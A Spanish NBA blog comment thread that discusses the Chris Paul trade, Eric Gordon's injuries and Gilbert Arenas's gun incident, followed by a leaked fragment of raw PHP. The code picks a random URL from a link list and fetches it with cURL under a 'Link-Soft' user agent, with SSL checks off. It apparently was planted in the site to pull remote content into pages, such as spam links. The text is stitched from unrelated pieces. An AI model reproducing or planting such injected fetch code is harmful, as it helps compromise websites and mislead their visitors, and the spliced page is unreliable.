    Por cierto, New Orleans y Stern se irán dando cuenta de que su trade por CP3 fue una bazofia. Gordon (60 partidos por temporada, y en esta ni llegará a 40), Aminu (fuera de rotación prácticamente), Kaman (que suele lesionarse, y acaba contrato, y no renovará por menos de 8-9 kilos), y una ronda de Minnesota que tampoco va a ser muy alta que digamos, quizá ni top10. A ver quién compra este pufo de equipo…

      Citar

  40. melo15 dice:
    #40

    No pasa nada si no es top 10 en el proximo draft, hay tanto jugador que Austin Rivers es 12 en NBADRAFT

      Citar

  41. melo15 dice:
    #41

    Me da tanta pena los jugadores, que pueden ser estrellas y se quedan en nada, por las lesiones, Oden, Roy, Gordon..

      Citar

  42. Sancho88 dice:
    #42

    Además, la propia vorágine de la competición los va olvidando, por eso en el deporte de alta competición no vale quién fuiste, sino quién eres. Para mí, el mayor ejemplo de estrella del baloncesto echada a perder es Gilbert Arenas. Fue brutal su bajón de rendimiento el año pasado en Orlando, cuando en los Wizards tenía noches de más de 50 puntos.

      Citar

  43. melo15 dice:
    #43

    Que paso exactamente con Arenas??
    Me dijierom que le piyaron con una pisola en el vestuario

      Citar

  44. Sancho88 dice:
    #44

    jejej, que jovenzuelo que eres melo. Pues creo que pasó hace dos temporadas, si no me equivoco. Javaris Crittenton desenfundó, él también, y dicen que Arenas le apuntó con la pipa. Luego la liga le suspendió toda la temporada, le piyaron los Magic, jugó una mierda de temporada el año pasado, y ahora está amnistiado. Yo no le veo solución a Arenas. No creo que vuelva a ser ni una cuarta parte de lo que fue, y eso que aún es joven, no creo que llegue a 30 tacos. A ver quién es el listo que le da una opción de volver ahora, después de Iverson, T-MAC, Carter…

      Citar

  45. Jose Luis dice:
    #45

    Ahora Eric Gordon dice que rechaza la oferta de renovación de Hornets… bien Stern, sigue así!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>